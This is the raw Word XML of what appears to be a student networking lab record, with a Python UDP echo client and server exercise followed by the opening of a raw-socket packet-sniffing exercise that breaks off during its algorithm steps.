    <w:p w14:paraId="7EEAD4D5" w14:textId="1247D590" w:rsidR="00894973" w:rsidRDefault="00DA6EED" w:rsidP="00894973">
      <w:r>
        <w:t>Ex. No</w:t>
      </w:r>
      <w:r w:rsidR="00894973">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00A60065">
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B99EC5E" w14:textId="77777777" w:rsidR="00894973" w:rsidRDefault="00894973" w:rsidP="00894973"/>
    <w:p w14:paraId="26093FF3" w14:textId="7A4BA1FC" w:rsidR="003D5F4B" w:rsidRPr="003D5F4B" w:rsidRDefault="003D5F4B" w:rsidP="003D5F4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D5F4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Intro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>duction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE70A0B" w14:textId="77777777" w:rsidR="003D5F4B" w:rsidRDefault="003D5F4B" w:rsidP="003D5F4B">
      <w:r w:rsidRPr="003D5F4B">
        <w:t>UDP (User Datagram Protocol) is a connectionless protocol that allows sending messages (datagrams) between client and server without establishing a connection. This experiment demonstrates a simple UDP client-server communication in Python.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011568B4" w14:textId="77777777" w:rsidR="003D5F4B" w:rsidRPr="003D5F4B" w:rsidRDefault="003D5F4B" w:rsidP="003D5F4B"/>
    <w:p w14:paraId="79792DBF" w14:textId="2D5E74CB" w:rsidR="003D5F4B" w:rsidRPr="003D5F4B" w:rsidRDefault="003D5F4B" w:rsidP="003D5F4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D5F4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Aim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DCEBDA" w14:textId="77777777" w:rsidR="003D5F4B" w:rsidRDefault="003D5F4B" w:rsidP="003D5F4B">
      <w:r w:rsidRPr="003D5F4B">
        <w:t>Develop a simple UDP server and client using Python’s socket module to exchange messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA1D6CA" w14:textId="77777777" w:rsidR="003D5F4B" w:rsidRPr="003D5F4B" w:rsidRDefault="003D5F4B" w:rsidP="003D5F4B"/>
    <w:p w14:paraId="0E50E097" w14:textId="3613604C" w:rsidR="003D5F4B" w:rsidRPr="003D5F4B" w:rsidRDefault="003D5F4B" w:rsidP="003D5F4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D5F4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Algorithm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC4C4E4" w14:textId="77777777" w:rsidR="003D5F4B" w:rsidRPr="003D5F4B" w:rsidRDefault="003D5F4B" w:rsidP="003D5F4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D5F4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC235F8" w14:textId="77777777" w:rsidR="003D5F4B" w:rsidRPr="003D5F4B" w:rsidRDefault="003D5F4B" w:rsidP="003D5F4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D5F4B">
        <w:t>Create a UDP socket and bind it to an IP and port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179D4E74" w14:textId="77777777" w:rsidR="003D5F4B" w:rsidRPr="003D5F4B" w:rsidRDefault="003D5F4B" w:rsidP="003D5F4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D5F4B">
        <w:t>Wait for incoming messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D76613" w14:textId="77777777" w:rsidR="003D5F4B" w:rsidRPr="003D5F4B" w:rsidRDefault="003D5F4B" w:rsidP="003D5F4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D5F4B">
        <w:t>Receive data, print it, and optionally send a reply.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A73A7A4" w14:textId="77777777" w:rsidR="003D5F4B" w:rsidRPr="003D5F4B" w:rsidRDefault="003D5F4B" w:rsidP="003D5F4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D5F4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Client:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F31605" w14:textId="77777777" w:rsidR="003D5F4B" w:rsidRPr="003D5F4B" w:rsidRDefault="003D5F4B" w:rsidP="003D5F4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D5F4B">
        <w:t>Create a UDP socket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A096AE" w14:textId="77777777" w:rsidR="003D5F4B" w:rsidRPr="003D5F4B" w:rsidRDefault="003D5F4B" w:rsidP="003D5F4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D5F4B">
        <w:t>Send message to server IP and port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC17B63" w14:textId="77777777" w:rsidR="003D5F4B" w:rsidRDefault="003D5F4B" w:rsidP="003D5F4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D5F4B">
        <w:t>Receive reply from server and display it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4D253A" w14:textId="77777777" w:rsidR="003D5F4B" w:rsidRDefault="003D5F4B" w:rsidP="00644A5B"/>
    <w:p w14:paraId="556BBFCE" w14:textId="38C8E0F9" w:rsidR="00644A5B" w:rsidRDefault="00644A5B" w:rsidP="00644A5B">
      <w:r w:rsidRPr="00644A5B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Code</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25846E7F" w14:textId="077C65EE" w:rsidR="00644A5B" w:rsidRDefault="00644A5B" w:rsidP="00644A5B">
      <w:r w:rsidRPr="00644A5B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF56EFF" w14:textId="77777777" w:rsidR="009628B4" w:rsidRDefault="009628B4" w:rsidP="009628B4">
      <w:r>
        <w:t>import socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B00ABE" w14:textId="77777777" w:rsidR="009628B4" w:rsidRDefault="009628B4" w:rsidP="009628B4"/>
    <w:p w14:paraId="7D99209E" w14:textId="77777777" w:rsidR="009628B4" w:rsidRDefault="009628B4" w:rsidP="009628B4">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>sockfd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>socket.socket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>socket.AF_INET</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>socket.SOCK_DGRAM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76854881" w14:textId="77777777" w:rsidR="009628B4" w:rsidRDefault="009628B4" w:rsidP="009628B4">
      <w:r>
        <w:t>print('UDP Socket Created')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFDEC2B" w14:textId="77777777" w:rsidR="009628B4" w:rsidRDefault="009628B4" w:rsidP="009628B4">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sockfd.bind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(('localhost', 55555))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075A0BA9" w14:textId="77777777" w:rsidR="009628B4" w:rsidRDefault="009628B4" w:rsidP="009628B4">
      <w:r>
        <w:t>print('Waiting for messages')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117A9046" w14:textId="77777777" w:rsidR="009628B4" w:rsidRDefault="009628B4" w:rsidP="009628B4">
      <w:r>
        <w:t>while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FD8627" w14:textId="77777777" w:rsidR="009628B4" w:rsidRDefault="009628B4" w:rsidP="009628B4">
      <w:r>
        <w:t xml:space="preserve">    data, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sockfd.recvfrom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(1024)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A104CE7" w14:textId="77777777" w:rsidR="009628B4" w:rsidRDefault="009628B4" w:rsidP="009628B4">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>receivedMsg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>data.decode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E62FF61" w14:textId="77777777" w:rsidR="009628B4" w:rsidRDefault="009628B4" w:rsidP="009628B4">
      <w:r>
        <w:t xml:space="preserve">    print("Received message from", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EBEE54" w14:textId="77777777" w:rsidR="009628B4" w:rsidRDefault="009628B4" w:rsidP="009628B4">
      <w:r>
        <w:t xml:space="preserve">    print("Message:", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>receivedMsg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055CF73E" w14:textId="63689C36" w:rsidR="009628B4" w:rsidRDefault="009628B4" w:rsidP="009628B4">
      <w:r>
        <w:t xml:space="preserve">       # Send the same message back to client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A85A9B6" w14:textId="77777777" w:rsidR="009628B4" w:rsidRDefault="009628B4" w:rsidP="009628B4">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sockfd.sendto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(data, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CCA10E" w14:textId="77777777" w:rsidR="009628B4" w:rsidRDefault="009628B4" w:rsidP="009628B4">
      <w:r>
        <w:t xml:space="preserve">    print("Message reply sent to Client!")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D81EF3C" w14:textId="77777777" w:rsidR="009628B4" w:rsidRDefault="009628B4" w:rsidP="009628B4">
      <w:r>
        <w:t xml:space="preserve">    choice = input("Do you want to continue (type y or n): ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC3B86D" w14:textId="77777777" w:rsidR="009628B4" w:rsidRDefault="009628B4" w:rsidP="009628B4">
      <w:r>
        <w:t xml:space="preserve">    if choice == 'n':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B86E92A" w14:textId="77777777" w:rsidR="009628B4" w:rsidRDefault="009628B4" w:rsidP="009628B4">
      <w:r>
        <w:t xml:space="preserve">        break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F51DF23" w14:textId="28C7F823" w:rsidR="00644A5B" w:rsidRDefault="009628B4" w:rsidP="009628B4">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sockfd.close</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49516FB2" w14:textId="77777777" w:rsidR="009628B4" w:rsidRDefault="009628B4" w:rsidP="009628B4"/>
    <w:p w14:paraId="5A53B83A" w14:textId="63F8755C" w:rsidR="009628B4" w:rsidRDefault="009628B4" w:rsidP="009628B4">
      <w:r w:rsidRPr="009628B4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Client</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D460030" w14:textId="77777777" w:rsidR="00272677" w:rsidRDefault="00272677" w:rsidP="00272677">
      <w:r>
        <w:t>import socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68922AF3" w14:textId="77777777" w:rsidR="00272677" w:rsidRDefault="00272677" w:rsidP="00272677">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>clientfd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>socket.socket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>socket.AF_INET</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>socket.SOCK_DGRAM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BC7D14" w14:textId="77777777" w:rsidR="00272677" w:rsidRDefault="00272677" w:rsidP="00272677">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>server_address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = ('localhost', 55555)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C846EB4" w14:textId="77777777" w:rsidR="00272677" w:rsidRDefault="00272677" w:rsidP="00272677">
      <w:r>
        <w:t>name = input("Enter your message: ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F97C3C2" w14:textId="77777777" w:rsidR="00272677" w:rsidRDefault="00272677" w:rsidP="00272677">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>clientfd.sendto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>name.encode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>server_address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B82E941" w14:textId="77777777" w:rsidR="00272677" w:rsidRDefault="00272677" w:rsidP="00272677">
      <w:r>
        <w:t xml:space="preserve">data, _ = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>clientfd.recvfrom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(1024)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483B42D2" w14:textId="77777777" w:rsidR="00272677" w:rsidRDefault="00272677" w:rsidP="00272677">
      <w:r>
        <w:t xml:space="preserve">print("Message Received from Server:", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>data.decode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C7D608" w14:textId="43E5D0A9" w:rsidR="009628B4" w:rsidRPr="003D5F4B" w:rsidRDefault="00272677" w:rsidP="00272677">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>clientfd.close</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E2C4BE" w14:textId="77777777" w:rsidR="00894973" w:rsidRDefault="00894973" w:rsidP="00894973"/>
    <w:p w14:paraId="00697BCF" w14:textId="06867CF3" w:rsidR="00015A27" w:rsidRDefault="00015A27" w:rsidP="00894973">
      <w:r w:rsidRPr="00015A27">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5667A0" w14:textId="0718F09B" w:rsidR="00015A27" w:rsidRDefault="005A33FB" w:rsidP="00894973">
      <w:r w:rsidRPr="005A33FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Server</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338974E3" w14:textId="77777777" w:rsidR="005A33FB" w:rsidRDefault="005A33FB" w:rsidP="00894973"/>
    <w:p w14:paraId="6964ACE4" w14:textId="6BB8E382" w:rsidR="005A33FB" w:rsidRDefault="0075057B" w:rsidP="00894973">
      <w:r w:rsidRPr="0075057B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EFCF38E" wp14:editId="0125BB86">
            <wp:extent cx="5731510" cy="2337435"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="112044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49008" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2337435"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="146A7567" w14:textId="77777777" w:rsidR="00894973" w:rsidRDefault="00894973" w:rsidP="00894973"/>
    <w:p w14:paraId="17F04703" w14:textId="34C430D0" w:rsidR="0075057B" w:rsidRDefault="0075057B" w:rsidP="00894973">
      <w:r w:rsidRPr="0075057B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Client</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622CA57B" w14:textId="77777777" w:rsidR="0075057B" w:rsidRDefault="0075057B" w:rsidP="00894973"/>
    <w:p w14:paraId="4511818B" w14:textId="65791A42" w:rsidR="0075057B" w:rsidRDefault="0056278C" w:rsidP="00894973">
      <w:r w:rsidRPr="0056278C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71F13EA6" wp14:editId="08E874F9">
            <wp:extent cx="5731510" cy="1652905"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="128699891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98911" name="Picture 1" descr="A screen shot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1652905"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="107AEB0D" w14:textId="77777777" w:rsidR="00894973" w:rsidRDefault="00894973" w:rsidP="00894973"/>
    <w:p w14:paraId="21A1C07A" w14:textId="77777777" w:rsidR="00894973" w:rsidRDefault="00894973" w:rsidP="00894973"/>
    <w:p w14:paraId="23BE7824" w14:textId="77777777" w:rsidR="00894973" w:rsidRDefault="00894973" w:rsidP="00894973"/>
    <w:p w14:paraId="5C59D05A" w14:textId="77777777" w:rsidR="00894973" w:rsidRDefault="00894973" w:rsidP="00894973"/>
    <w:p w14:paraId="61B27797" w14:textId="62C712D8" w:rsidR="00894973" w:rsidRDefault="0056278C" w:rsidP="00894973">
      <w:r w:rsidRPr="0056278C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C17EC26" w14:textId="42B54102" w:rsidR="009D3DF9" w:rsidRDefault="004F60DF" w:rsidP="00894973">
      <w:r w:rsidRPr="004F60DF">
        <w:t>The UDP client successfully sent messages to the server, and the server received and replied to each message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C85AF4C" w14:textId="77777777" w:rsidR="00894973" w:rsidRDefault="00894973" w:rsidP="00894973"/>
    <w:p w14:paraId="17FAB14C" w14:textId="77777777" w:rsidR="00894973" w:rsidRDefault="00894973" w:rsidP="00894973"/>
    <w:p w14:paraId="42699A34" w14:textId="77777777" w:rsidR="000476AD" w:rsidRDefault="000476AD" w:rsidP="004F60DF"/>
    <w:p w14:paraId="37CADC49" w14:textId="5B37D5D7" w:rsidR="000476AD" w:rsidRDefault="00A52A5F" w:rsidP="00A52A5F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>IMPLEMENT PACKET SNIFFING USING RAW SOCKETS IN PYTHON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2C3D29" w14:textId="77777777" w:rsidR="00A52A5F" w:rsidRDefault="00A52A5F" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="2B3C92EF" w14:textId="78C9695D" w:rsidR="00A52A5F" w:rsidRDefault="0047616A" w:rsidP="00A52A5F">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Ex.No</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00D7418E">
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9B3B33" w14:textId="77777777" w:rsidR="0047616A" w:rsidRDefault="0047616A" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="1812BF06" w14:textId="04C45D87" w:rsidR="00B3217F" w:rsidRPr="00B3217F" w:rsidRDefault="00B3217F" w:rsidP="00B3217F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3217F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Intro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>duction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223718D5" w14:textId="77777777" w:rsidR="00B3217F" w:rsidRDefault="00B3217F" w:rsidP="00B3217F">
      <w:r w:rsidRPr="00B3217F">
        <w:t>Packet sniffing reads raw network packets from your NIC so you can see headers (Ethernet/IP/TCP/UDP) and a bit of payload. This simple experiment uses Linux raw sockets to capture and print a brief summary for each IPv4 packet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B0866E" w14:textId="77777777" w:rsidR="001E634C" w:rsidRPr="00B3217F" w:rsidRDefault="001E634C" w:rsidP="00B3217F"/>
    <w:p w14:paraId="36C05A14" w14:textId="7C44B185" w:rsidR="00B3217F" w:rsidRPr="00B3217F" w:rsidRDefault="00B3217F" w:rsidP="00B3217F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3217F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Aim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4C7BAC" w14:textId="77777777" w:rsidR="00B3217F" w:rsidRDefault="00B3217F" w:rsidP="00B3217F">
      <w:r w:rsidRPr="00B3217F">
        <w:t>Write a minimal Python program that captures packets using a raw socket and prints source/destination IP, protocol, ports (if TCP/UDP) and a short hex dump of the payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8628DA" w14:textId="77777777" w:rsidR="001E634C" w:rsidRPr="00B3217F" w:rsidRDefault="001E634C" w:rsidP="00B3217F"/>
    <w:p w14:paraId="6D31371E" w14:textId="40F08BDF" w:rsidR="00B3217F" w:rsidRPr="00B3217F" w:rsidRDefault="00B3217F" w:rsidP="00B3217F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3217F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Algorithm </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141C7E99" w14:textId="77777777" w:rsidR="00B3217F" w:rsidRPr="00B3217F" w:rsidRDefault="00B3217F" w:rsidP="00B3217F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3217F">
        <w:t xml:space="preserve">Open a raw AF_PACKET socket (capture all </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B3217F">
        <w:t>EtherTypes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B3217F">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2431816F" w14:textId="77777777" w:rsidR="00B3217F" w:rsidRPr="00B3217F" w:rsidRDefault="00B3217F" w:rsidP="00B3217F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3217F">
        <w:t>Loop: receive a packet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3F4E9A" w14:textId="77777777" w:rsidR="00B3217F" w:rsidRPr="00B3217F" w:rsidRDefault="00B3217F" w:rsidP="00B3217F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3217F">
